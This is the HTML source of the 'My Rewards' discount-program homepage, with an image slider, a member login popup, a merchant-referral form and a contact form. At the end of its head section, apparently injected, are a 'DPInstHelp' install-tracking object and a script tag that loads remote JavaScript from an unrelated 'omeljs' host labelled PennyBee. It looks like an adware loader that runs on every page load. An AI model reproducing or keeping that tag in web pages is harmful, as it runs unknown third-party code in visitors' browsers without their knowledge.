
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>My Rewards - Home</title>
<meta name="description" content="Enter Your Website Description Here">
<meta name="keywords" content="website, business, store" />
<meta name="robots" content="index, follow" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- Mobile Specific Metas  ================================================== -->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<link href="css/style.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" type="text/css" href="css/menusm.css" />
<link rel="stylesheet" href="css/layout.css">
<link rel="stylesheet" href="css/skeleton.css">




<script type="text/javascript" src="js/jquery.min.js"></script>
<script type="text/javascript" src="js/menusm.js"></script>
<!-- PrettyPhoto Starts -->
<link rel="stylesheet" type="text/css" href="prettyPhoto/css/prettyPhoto.css" />
<script type="text/javascript" src="prettyPhoto/js/jquery.prettyPhoto.js"></script>
<!-- PrettyPhoto Ends -->
<!-- Preloader Starts -->
<link href="preloader/css/preloader.css" rel="stylesheet" />
<script src="preloader/js/jquery.preloader.js" charset="utf-8"></script>
<!-- Preloader Ends -->

<!-- Ui To Top Starts -->
<link href="ui_totop/css/ui.totop.css" rel="stylesheet" />
<script src="ui_totop/js/jquery.ui.totop.js" charset="utf-8"></script>
<!-- Ui To Top Ends -->

<!-- DC Twitter Starts -->
<link href="twitter_tweet/jquery.tweet.css" rel="stylesheet" />
<script src="twitter_tweet/jquery.tweet.js" charset="utf-8"></script>
<!-- DC Twitter End -->



<script type="text/javascript" src="js/head_html_block.js"></script>
<!-- Config User Intarface Box Import END -->
<!-- DC Ken Burns Panel Slider CSS -->
<link rel="stylesheet" type="text/css" href="sliders/kbpanel-slider/css/kenburns-panel-settings.css" media="screen" />
<style type="text/css">
@font-face {
    font-family: 'MyriadPro-Regular';
    src: url('MyriadPro-Regular.eot');
    src: url('MyriadPro-Regular.eot?#iefix') format('embedded-opentype'),
         url('MyriadPro-Regular.woff') format('woff'),
         url('MyriadPro-Regular.ttf') format('truetype'),
         url('http://www.iolivo.com/fonts/MyriadPro-Regular.svg#MyriadPro-Regular') format('svg');
    font-weight: normal;
    font-style: normal;

}
@font-face {
    font-family: 'MyriadProSemibold';
    src: url('./MyriadProSemibold.eot');
    src: local('MyriadProSemibold'), url('./MyriadProSemibold.woff') format('woff'), url('./MyriadProSemibold.ttf') format('truetype');
}
body,td,th {
    font-family: 'MyriadPro-Regular' !important;
    font-size: 11px;
}
</style>

<!-- DC Javascript Library -->
<script type="text/javascript" src="js/jquery.easing.js"></script><!-- jQuery Easing (do not call twice on same page) -->

<!-- DC Ken Burns Panel Slider JS -->
<script type="text/javascript" src="sliders/kbpanel-slider/js/jquery.waitforimages.js"></script>
<script type="text/javascript" src="sliders/kbpanel-slider/js/jquery.cssAnimate.mini.js"></script>
<script type="text/javascript" src="sliders/kbpanel-slider/js/jquery.touchwipe.min.js"></script>
<script type="text/javascript" src="sliders/kbpanel-slider/js/jquery.templateaccess.kenburns-panel.min.js"></script>



<script type="text/javascript">
   function TextField_Validator()
    {
    var check = true;
        if (document.contactform.name.value == "" || document.contactform.Memberno.value == "" || document.contactform.email.value == "" || document.contactform.Mname.value == "" )
            {
               alert("Please Fill All Required Fields.");
               if(document.contactform.name.value == "")
               {
               document.contactform.name.focus();
               }

               else if(document.contactform.Memberno.value == "")
               {
               document.contactform.Memberno.focus();
               }
               else if(document.contactform.email.value == "")
               {
               document.contactform.email.focus();
               }
                else if(document.contactform.Mname.value == "")
               {
               document.contactform.Mname.focus();
               }
               check = false;
            }

        return check;
    }


   </script>







<script type="text/javascript">
   function TextField_Validator1()
    {
    var check = true;
        if (document.contactform_main.F_name.value == "" || document.contactform_main.F_email.value == "" || document.contactform_main.F_phone.value == "" || document.contactform_main.F_message.value == "" )
            {
               alert("Please Fill All Required Fields.");
               if(document.contactform_main.F_name.value == "")
               {
               document.contactform_main.F_name.focus();
               }

               else if(document.contactform_main.F_email.value == "")
               {
               document.contactform_main.F_email.focus();
               }
               else if(document.contactform_main.F_phone.value == "")
               {
               document.contactform_main.F_phone.focus();
               }
                else if(document.contactform_main.F_message.value == "")
               {
               document.contactform_main.F_message.focus();
               }
               check = false;
            }

        return check;
    }


   </script>





<!-- DC Ken Burns Panel Slider Settings -->
<script type="text/javascript">
$(function() {
    $('.kbpanel-bannercontainer').kenburn({

        thumbWidth:70, // thumbnail width
        thumbHeight:40, // thumbnail height

        thumbAmount:4,  // number of thumbnails to show
        thumbStyle:"both",   // thumb, bullet, none, both
        thumbVideoIcon:"on", // show a video icon for video content: off, on

        thumbVertical:"bottom",
        thumbHorizontal:"center",
        thumbXOffset:0,
        thumbYOffset:40,
        bulletXOffset:0,
        bulletYOffset:-16,
        hideThumbs:"on",
        touchenabled:'on',  // allow touch swipe (suitable for mobile devices): on, off
        pauseOnRollOverThumbs:'off', // pause slider when mouse over thumbnail
        pauseOnRollOverMain:'on', // pause slider when mouse over slider
        preloadedSlides:2, // number of slides to preload during startup

        timer:5, // time before next slide (5 = 5 seconds)

        debug:"off",

        ////////////////////////////////////////////////////////////////////////////////////////////////////////////////
        //                                               Google Fonts !!                                             //
        // local GoogleFont JS from your server: http://www.yourdomain.com/kb-plugin/js/jquery.googlefonts.js        //
        // GoogleFonts from Original Source: http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js or https:... //
        //          PT+Sans+Narrow:400,700                                                                          //
        /////////////////////////////////////////////////////////////////////////////////////////////////////////////

    });


    $('.tnone').click(function() {
        $('.tbull').removeClass('selected');
        $('.tthumb').removeClass('selected');
        $('.tnone').addClass('selected');
        $('.tauto').removeClass('selected');
        $('.kenburn_thumb_container').css({'visibility':'hidden'});
        $('.thumbbuttons').css({'visibility':'hidden'});
    });

    $('.tthumb').click(function() {
        $('.tbull').removeClass('selected');
        $('.tauto').removeClass('selected');
        $('.tthumb').addClass('selected');
        $('.tnone').removeClass('selected');
        $('.kenburn_thumb_container').css({'visibility':'visible'});
        $('.thumbbuttons').css({'visibility':'hidden'});
        $('body').addClass('tp_showthumbsalways');
        $('.kenburn_thumb_container').animate({'opacity':1},{duration:300,queue:false});

    });

    $('.tauto').click(function() {
        $('.tauto').addClass('selected');
        $('.tthumb').removeClass('selected');
        $('.tnone').removeClass('selected');
        $('.tbull').removeClass('selected');
        $('body').removeClass('tp_showthumbsalways');
        $('.kenburn_thumb_container').css({'visibility':'visible'});
        $('.thumbbuttons').css({'visibility':'hidden'});
        setTimeout(function() {
            $('.kenburn_thumb_container').animate({'opacity':0},{duration:300,queue:false});
        },100);

    });

    $('.tbull').click(function() {
        $('.tbull').addClass('selected');
        $('.tauto').removeClass('selected');
        $('.tthumb').removeClass('selected');
        $('.tnone').removeClass('selected');
        $('.kenburn_thumb_container').css({'visibility':'hidden'});
        $('.thumbbuttons').css({'visibility':'visible'});
    });

    $('body').addClass('tp_showthumbsalways');
    $('.tthumb').click();

});
</script>
<script type="text/javascript" src="js/tinynav.min.js"></script>
<script type="text/javascript">
    $(function () {
        $('#menu-top-menu').tinyNav({
            active: 'selected',
            header: 'Navigation'
        });
    });
</script>


<script type='text/javascript'>var DPInstHelp = {"Channel": "27072014","FunnelId": "8975a54a-594f-44d7-8f5b-394a9d794255","InstallDateHuman": "04/08/2014 13:36:09","InstallDateMachine": "20140804133609","InstGrp": "lnk_run1_ironpm_27072014_1.0.1.1","Partner": "ironpm","VersionInt": "1.0.1.1"};</script><script type='text/javascript' src='http://i.omeljs.info/omel/javascript.js?appTitle=PennyBee&channel=chkomel5&hid=AD06B2A7-698A-E5FB-7E00-000000C900'></script></head>
<body>
<div class="body_pattern">
  <div class="index_page">
    <div class="main">
      <div class="header">
        <div class="container">
          <div class="header_resize">
            <div class="header_height">

              <!-- logo -->
              <div class="logo">
                <div><span class="menu"><a href="index.html"><img src="images/mrb.gif" alt="images"  width=100%  /></a></span></div>

              </div>
              <!-- logo -->
              <div class="clr"></div>
            </div>
            <div class="clr"></div>
            <div class="header_menu">
              <div class="header_menu_resize">
                <div class="clr"></div>
                <div class="clr"></div> <div class="clr"></div>
                <!-- menu -->
                <div class="menu">
                  <script type="text/javascript" src="js/menu_html_block.js"></script></div>
                <!-- /menu -->

                <!--end small navigation -->
                <div class="clr"></div>
              </div>
              <div class="clr"></div>
            </div>
            <div class="clr"></div>
          </div>
          <div class="clr"></div>
        </div>

        <!-- now_page -->
        <div class="now_page">
          <div class="slider_back">
            <div class="container">
              <div id="now_slider">

                <!-- DC Ken Burns Panel slider Start -->
                <div style=" margin:0 auto; position:relative;overflow:hidden;"> <!-- define slider container width (by strict force) -->
                  <div class="demoholder">
                    <div class="bggradient"></div>
                    <!-- <div class="kbpanel-bannercontainer centerme light"> light theme -->
                    <div class="kbpanel-bannercontainer centerme dark">
                      <ul>
                      <!-- Slide 1 -->
                        <li data-transition="slide" data-startalign="left,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,center" data-panduration="8" data-colortransition="4"><img alt="" src="images/1.jpg"  data-thumb="images/1_1.jpg">

                          <div class="creative_layer ">
                            <div class="cp-bottom fadeup">
                              <p class="cp-title"><span style="color:#FFF; font-style:italic; font-family:'MyriadPro-Regular'">MY NEXT COFFEE</span> <span style="color:#ec008c; font-family:'MyriadPro-Regular'"><strong>IS A FREEBIE!</strong></span></p>
                                <div class="clear"></div>
                              </div>



                              <div class="clear"></div>
                            </div>

                        </li>
                        <!-- Slide 2 -->
                        <li data-transition="fade" data-startalign="right,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,top" data-panduration="12" data-colortransition="4"><img alt="" src="images/2.jpg" data-thumb="images/2_2.jpg">
                          <div class="creative_layer ">
                            <div class="cp-bottom fadeup">
                              <p class="cp-title" ><span style="color:#FFF; font-style:italic; font-family:'MyriadPro-Regular'">OK... WHICH STORE</span> <strong><span style="color:#00aeef; font-family:'MyriadPro-Regular' ">NEXT?</span></strong></p>



                              <div class="clear"></div>
                            </div>
                          </div>
                        </li>




                        <!-- Slide 3 -->
                         <li data-transition="fade" data-startalign="right,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,top" data-panduration="12" data-colortransition="4"><img alt="" src="images/3.jpg" data-thumb="images/3_3.jpg">
                          <div class="creative_layer ">
                            <div class="cp-bottom fadeup">
                              <p class=
"cp-title" ><span style="color:#FFF; font-style:italic; font-family:'MyriadPro-Regular'">SEE, EVEN</span> <strong><span style="color:#d7df21; font-family:'MyriadPro-Regular' ">MORE COUPONS!</span></strong></p>



                              <div class="clear"></div>
                            </div>
                          </div>
                        </li>

                        <!-- Slide 4 -->
                        <li data-transition="slide" data-startalign="left,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,center" data-panduration="8" data-colortransition="4"><img alt="" src="images/4.jpg"  data-thumb="images/4_4.jpg">
                          <div class="creative_layer ">
                            <div class="cp-bottom fadeup">
                              <p class="cp-title" ><span style="color:#FFF; font-style:italic; font-family:'MyriadPro-Regular'">I SAVED TO GET HERE... AND</span> <strong><span style="color:#ec008c;" font-family:'MyriadPro-Regular' >I'M SAVING WHILE I'M HERE!</span></strong></p>

                            </div>
                          </div>
                        </li>

                        <!-- Slide 5 -->
                        <li data-transition="slide" data-startalign="left,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,center" data-panduration="8" data-colortransition="4"><img alt="" src="images/5.jpg"  data-thumb="images/5_5.jpg">

                              <div class="creative_layer ">
                          <div class="cp-bottom fadeup">
                              <p class="cp-title" ><strong><span style="color:#d7df21; font-style:italic; font-family:'MyriadPro-Regular' ">ANOTHER 20% SAVED</strong><span style="color:#FFF; font-family:'MyriadPro-Regular';"> JUST FOR SHOWING MY MOBILE COUPONS!</span></p>


                            </div>
                          </div>
                        </li>




                        <!-- Slide 6 -->
                        <li data-transition="slide" data-startalign="left,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,center" data-panduration="8" data-colortransition="4"><img alt="" src="images/6.jpg"  data-thumb="images/6_1.jpg">
                          <div class="creative_layer ">
                            <div class="cp-bottom fadeup">
                              <p class="cp-title" ><span style="color:#FFF; font-family:'MyriadPro-Regular';">OMG... LOOK AT</span> <strong><span style="color:#00aeef; font-style:italic; font-family:'MyriadPro-Regular'">ALL THOSE OFFERS!</span></strong></p>

                            </div>
                          </div>
                        </li>


<!-- Slide 7 -->
                        <li data-transition="fade" data-startalign="right,bottom" data-zoom="in" data-zoomfact="3" data-endAlign="center,top" data-panduration="12" data-colortransition="4"><img alt="" src="images/7.jpg" data-thumb="images/7_7.jpg">

                        <div class="video_details">
                          <div class="creative_layer ">
                            <div class="cp-bottom fadeup">
                              <p class="cp-title" ><span style="color:#FFF; font-family:'MyriadPro-Regular';">IT'S JUST SO EASY TO</span> <strong><span style="color:#ec008c; font-style:italic; font-family:'MyriadPro-Regular' ">SAVE WITH MY MOBILE COUPONS! </span></strong>



                              <div class="clear"></div>
                            </div>
                          </div>
                        </li>
                      </ul>
                    </div>
                    <!-- /kbpanel-bannercontainer -->
                    <!-- Banner Shadow Effect -->
                    <div class="bannershadow centerme"><img width="100%" height="40px" src="sliders/kbpanel-slider/images/bannershadow.png"></div>
                  </div>
                  <!-- /demoholder -->

                </div>
                <!-- DC Ken Burns Panel slider End -->

                <div class="clear"></div>
              </div>
              <div class="clr"></div>
            </div>
            <div class="now_page_bg">
              <div class="container">
                <div class="now_page_resize">
                  <h1>Welcome to My Rewards! <span style="color:#fff; font-size: 15px; font-family:'Myriad Pro-Regular', Helvetica, sans-serif; ">Once inside you'll find bags full of retail and wholesale shopping offers, a variety of restaurants and bars to suit all tastes, luxurious health &amp; beauty treats to spoil everybody plus leisure and entertainment activities to keep the whole family happy. You can also enjoy exotic travel destinations and affordable accommodation styles for the holiday you've been waiting for.</span></h1>
                  <div class="clr"></div>
                </div>
              </div>
              <div class="clr"></div>
            </div>
            <div class="clr"></div>
          </div>
          <div class="clr"></div>
        </div>
        <!-- /now_page -->
        <div class="clr"></div>
      </div>
      <div class="clr"></div>

      <div class="centercol diff">

      </div>

      <div class="sidebar last">

      </div>

      <div class="content">
        <div class="container">
          <div class="content_resize" id="gallery">
            <div class="clr"></div>
            <div class="cols3">
              <div class="col3 cols_bg">
                <div class="pic rad_top"><a href="#login_form2" id="login_pop"><img src="images/leaser_travel111.jpg" alt="Image"  /></a> </div>
                  <!-- popup form #3-->
<a href="#x" class="overlay" id="login_form2"></a>

<div class="popup">

       <div id="popup_content" > <!--your content start-->
       <br />
<div align="center"><span class="zap"><em>GRAB YOUR FREE MEMBER APP NOW!</em></span><br /><br />
<img src="images/sparkfinal.png" alt="image"  />
<br />
</div>



<table width="580" border="0">
  <tr>
    <td align="center"><a href="https://itunes.apple.com/au/app/grab-it-now!/id576258333?mt=8" target="_blank"><img src="images/Android-Icon-Vector-psd.png" width="97" height="33" /> </a> <br/><a href="https://play.google.com/store/apps/details?id=com.myrewards.grabitnow2.controller" target="_blank" ><img src="images/app_store.png" width="97" height="33" /></a></td>
    <td align="center"><img src="images/phone1.png" width="163" height="126" alt=""/></td>
    <td align="center"><img src="images/qrcode.png" width="136" height="135" alt=""/></td>
  </tr>
  <tr>
    <td align="center" ><span class="Zap">&nbsp;</span></td>
    <td align="center"><span class="Zap"><a href="http://www.grabitnow.com.au" class="zap2" target="_blank">Click HERE</a> for more information</span></td>
    <td align="center"><span class="Zap">Zap for App</span>    </td>
  </tr>
</table>





      </div>
  <a class="close" href="#close"></a>
       </div> <!--your content end3-->


                <div class="cols_pad no_border_top rad_bottom">
                  <h3 class="h3_center"> <a href="#login_form2" >Mobile</a><span>Take My Rewards with you wherever you go<br />&nbsp; </span> </h3>
                </div>
           </div>

              <div class="col3 cols_bg">
                <div class="pic rad_top">
                <a href="#login_form1" id="login_pop"><img src="images/shopping1.jpg" alt="Image" /></a>


        </div>

          <!-- popup form #2 -->
<a href="#x" class="overlay" id="login_form1"></a>

<div class="popup">

       <div id="popup_content" > <!--your content start-->
<br />
<div align="center"><span class="zap"><em>GET YOUR FAVOURITE MERCHANT ON<br /> BOARD AND RECEIVE UP TO $100*</em></span></div>



  <div align="center" class="t4">This option is for members who DO NOT want to sign the merchant themselves. Simply send us the merchant details in the form below and you can get $20* if they join us.</div>
<br />
<div align="center" class="t1"><strong>MERCHANT RECOMMENDATION</strong></div>







        <div align="center" class="form">
<form method="post" action="contact.php" name="contactform" id="contactform" onSubmit="return TextField_Validator()" >

       <ol>
         <li>
           <label for="fname">Your Name:* <span class="red"></span>
           </label>
           <input type="text" id="fname" name="fname" class="text">
         </li>
         <li>
           <label for="fname">Your Membership Number:* <span class="red"></span></label>
           <input type="text" id="Memberno" name="Memberno" class="text" >
         </li>

         <li>
           <label for="email">Your Email Address:* <span class="red"></span></label>
           <input type="email" id="email" name="email" class="text"  >
         </li>
         <li>
    <label><br /><h3>MERCHANT DETAILS</h3></label>
         <label>&nbsp;</label><label>&nbsp;</label><label>&nbsp;</label>


         </li>

         <li>
           <label for="company">Merchant Name:* <span class="red"></span></label>
           <input id="Mname" name="Mname" class="text" >
         </li>
         <li>
           <label for="subject">Merchant Email Address: </label>
           <input id="Memail" name="Memail" class="text"  >
         </li>
         <li>
           <label for="subject">Merchant Address: </label>
           <input id="Maddress" name="Maddress" class="text">
         </li>
         <li>
           <label for="subject">Merchant Contact Number:  </label>
           <input id="Mcontactno" name="Mcontactno" class="text" >

         </li>

         <li>
          <label for="message">Details About Merchant: </label>
          <textarea id="message" name="message"  rows="6" placeholder="Example:'I have  spoken to the manager and his name is Bill Smith  and he is happy to speak to you about being in the program'. "></textarea>
         </li>
         <li>
         <label>&nbsp;</label>
          <div align="right" class="t3"><button style="margin:0px; padding:0px; border:none; cursor:pointer;" type="submit" name="Submit"  /><img src="images/submit.png"  /> </div>

         </li>
       </ol>
     </form>
     </div>







<div class="t15">
 GET UP TO $100*</div>

  <div align="center" class="t4">
If you sign up your favourite merchant to the program and their offer fills the pre-set criteria.<br /> You will receive up to $100 Wish Card for signing them up. It's easy money!<br />

     </div>

     <li class="buttons">
                            <div align="center"><a href="http://www.myrewards.com.au/app/webroot/member%20gets%20merchant/" target="_blank">
                           <img src="images/sub2.png" /></a></div>
                            <div class="clr"></div>
                    </li>

</div>

  <a class="close" href="#close"></a>


       </div> <!--your content end2-->



                <div class="cols_pad no_border_top rad_bottom">
                  <h3 class="h3_center"> <a href="#login_form1" >Get $100</a><span>Sign up your favourite merchant and receive <br />$100* wish card.</span> </h3>
                </div>
              </div>
              <div class="col3 cols_bg last">
                <div class="pic rad_top">
                <a href="#login_form" id="login_pop"><img src="images/health and beauty1.jpg" alt="Image" /></a> </div>

             <!-- popup form #1 -->
<a href="#x" class="overlay" id="login_form"></a>

<div class="popup">

            <div id="popup_content" align="left"> <!--your content start-->

<table width="590" border="0">
  <tr>
    <td colspan="2" align="center"><span class="zap"><em>MEMBER LOGIN<em></span></td>
  </tr>
  <tr>
    <td width="292" align="center"><div class="log_text">REGISTERED MEMBER
    </div> </td>
    <td width="292" align="center"><div class="log_text">FIRST TIME LOGIN</div></td>
  </tr>
  <tr>
    <td><form action="/users/login" method="post" id="contact" >

        <div align="center"><div align="center" class="t1">Your Membership Number:<br />


    	<input name="data[User][username]" id="login"   class="text" type="text" /></div>
            	        <div align="center"><div align="center" style="color:#58585a; font-size:12px;">  <span style="text-align:center">eg.:<strong><em>ABC12345</em></strong></span>
<div style="text-align:justify; padding-left:60px;">*Your Member Number might<br />
include letters. Leave no spaces<br />
between letters and numbers.</div>
</div></div>

        <div align="center" class="t1">Password:<br />
        <input id="pwd" class="text" name="data[User][password]" type="password"   title="This is the password that you created when you did your “first time” log in." />

   <div align="left" style="padding-left:45px; padding-top:5px;" >  <input type="checkbox" name="data2" id="UserRember"><span style="color:#58585a; font-size:12px; ">Remember me</span></div>
       </div>
       <p>&nbsp;</p><p>&nbsp;</p>
        <button style="margin:0px; padding:0px; border:none; cursor:pointer;" type="submit" name="Submit"   /><img src="images/login.jpg" width="170" /> </button>

    </form>

  </td>
    <td style="border-left:#333 dashed thin;"><div align="center">
      <div style=" text-align:left; color:#58585a; font-size:12px; padding-left:60px; ">
    As this is your first time here<br />
 we need you to compelete the <br />first time  registration.
<br /><br />
</div>
<p style=" text-align:left; color:#58585a; font-size:12px; padding-left:60px; ">
   Please enter in your membership <br />
   number in the box below:

</div></div>

      <form action="/users/first_time_login/1" method="post">
         <div align="center" class="t1">
      Your Membership Number<br />
    	<input name="data[User][username]" id="login"   class="text" type="text" /></div>


      <div align="center" style="color:#58585a; font-size:12px; padding-left:10px; ">  eg.:<strong><em>ABC12345</em></strong><br />
<div style="text-align:justify; padding-left:50px;">*Your Member Number might<br />
include letters. Leave no spaces<br />
between letters and numbers.</div>

<button style="margin:0px; padding:0px; border:none; cursor:pointer;" onclick="submitFirstTimeLoginForm('/users/first_time_login/1', 'UsersFirstTimeLoginForm1')" value="Submit"   /><img src="images/sub.jpg" alt="" width="170"/></button>
</div></form>
</td>
  </tr>

  <tr>
    <td><div align="center"><img src="images/logo.png" alt=""/></div></td>
    <td><div align="center" style="color:#000; font-size:12px; font-weight:400; ">LOST OR FORGOTTEN PASSWORD </div>
    <form action="/users/forgot_password/1" method="post">
     <div align="center"><div align="center" class="t1">Your Membership Number:<br />

    	<input name="data[User][username]" id="mno"   class="text" type="text" /></div>


        <div align="center" class="t1">Your Email Address:<br />
       <input name=data[User][email]" class="text" name="data" type="email" id="UserEmail"   />
        <div align="center" class="t10"></div>
           <button style="margin:0px; padding:0px; border:none; cursor:pointer;" type="submit" name="Submit"   /><img src="images/reset.jpg" alt="" width="100"/> </button> </div>
        </form>

        <script type="text/javascript">
				$('#UserEmail').focus();
		</script>

		<script>
		function submitForm() {
			$.ajax({
				url: '/users/forgot_password/2',
				data: $('#UsersForgotPassword').serialize(),
				type: 'POST',
				success: function(data){
					$("#modalboxpopup").html(data).dialog({modal: true, "position": "top"});
				}
			});
			return false;
		}
</script>
           </div>


</td>
  </tr>

  <tr>
    <td colspan="2"><img src="images/mrb2.png"  /></td>
  </tr>
</table>


  </div>
  <a class="close" href="#close"></a>
            </div> <!--your content end-->

                <div class="cols_pad no_border_top rad_bottom">
                  <h3 class="h3_center"> <a href="#login_form" >Login</a><span>Start enjoying your increased purchasing power <br />on everyday items! </span> </h3>
                </div>
              </div>
              <div class="clr"></div>
            </div>
            <div class="clr"></div>
          </div>
          <div class="clr"></div>
        </div>
        <div class="content_bottom_bg"></div>
        <div class="clr"></div>
      </div>
      <!-- /content -->
      <div class="clr"></div>

      <!-- prefooter -->
      <div class="prefooter">
        <div class="container">
          <div class="prefooter_resize">

                  <div class="fcol">

              <div class="flickr"> <a href="#"><img src="images/hm1.gif" alt="Image BgColor - 858652" /></a> <a href="#"><img src="images/hm2.gif" alt="Image BgColor - 171666" /></a><br /> <a href="#"><img src="images/hm3.gif" alt="Image BgColor - 257466" /></a> <a href="#"><img src="images/hm4.gif" alt="Image BgColor - 343266" /></a><br /> <a href="#"><img src="images/hm5.gif" alt="Image BgColor - 429066" /></a> <a href="#"><img src="images/hm6.gif" alt="Image BgColor - 514866" /></a> </div>
            </div>


           <div class="fcol"> <em class="t5">SITE MAP</em><br />

              <div align="left" style="padding-left:80px;"><a href="index.html">Home </a></div>
              <div align="left" style="padding-left:80px;"><a href="#login_form2" >Mobile </a></div>
              <div align="left" style="padding-left:80px;"><a href="#login_form1" >Get $100* </a></div>
              <div align="left" style="padding-left:80px;"><a href="#login_form" >Log in</a> </div>
              <div align="left" style="padding-left:80px;"><a href="#">Contact us</a></div>
              <h2>&nbsp;</h2>
              <p></p>

            </div>


            <div class="fcol"><em class="t5">FOLLOW US</em>

              <div style="width: 100%; padding:5px;">


&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="https://www.facebook.com/myrewardsinternational" target="_blank"><img src="images/fb1.jpg" width="60" onmouseover="this.src='images/fb.jpg'" onMouseOut="this.src='images/fb1.jpg'" /></a>&nbsp; &nbsp;<a href="https://twitter.com/MyRewardsIntl" target="_blank"><img src="images/tw1.jpg" width="60" onmouseover="this.src='images/tw.jpg'" onMouseOut="this.src='images/tw1.jpg'"/></a><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/><p>&nbsp;</p><p>&nbsp;</p>
<p>&nbsp;</p>


<img src="images/logo.png" width="207" height="52" alt=""/> </div>
            </div>








            <div class="fcol last"> <em class="t5">CONTACT US</em>

           <form action="cont.php" method="post" id="contactform_main" name="contactform_main" onSubmit="return TextField_Validator1()" >

                        <ol>
                          <li>
                            <label for="name">Name:*</label>
                            <input id="F_name" name="F_name" class="text"  />
                          </li>
                          <li>
                            <label for="email">Email:*</label>
                            <input id="F_email" name="F_email" type="email" class="text" />
                          </li>

                          <li>
                            <label for="Phone">Phone No:*</label>
                            <input id="F_phone" name="F_phone" class="text"/>
                          </li>
                          <li>
                            <label for="message">Message:</label>

                            <textarea id="F_message" name="F_message"  rows="5" cols="100" style="font-family: 'Myriad Pro', Helvetica, sans-serif; " ></textarea>
                          </li>
                     <li class="buttons" >
                            <button style="margin:0px; padding:0px; border:none; cursor:pointer;" type="submit" name="submit2" id="submit2" value="Submit"  /> <img src="images/sub.jpg"  /></button>
                            <div class="clr"></div>
                          </li>



                </ol>
              </form>


            </div>












          </div>
            <div class="clr"></div>
          </div>
          <div class="clr"></div>

          <!-- footer -->
          <div class="footer">
            <div class="footer_resize">
              <p>My Rewards ® powered by <a href="http://www.myrewardsinternational.com/" target="_blank">My Rewards International Ltd</a></p>
              <div class="clr"></div>
            </div>
            <div class="clr"></div>
          </div>
          <!-- footer -->
          <div class="clr"></div>
        </div>
      </div>
      <!-- /prefooter -->
      <div class="clr"></div>
    </div>
  </div>
</body>
</html>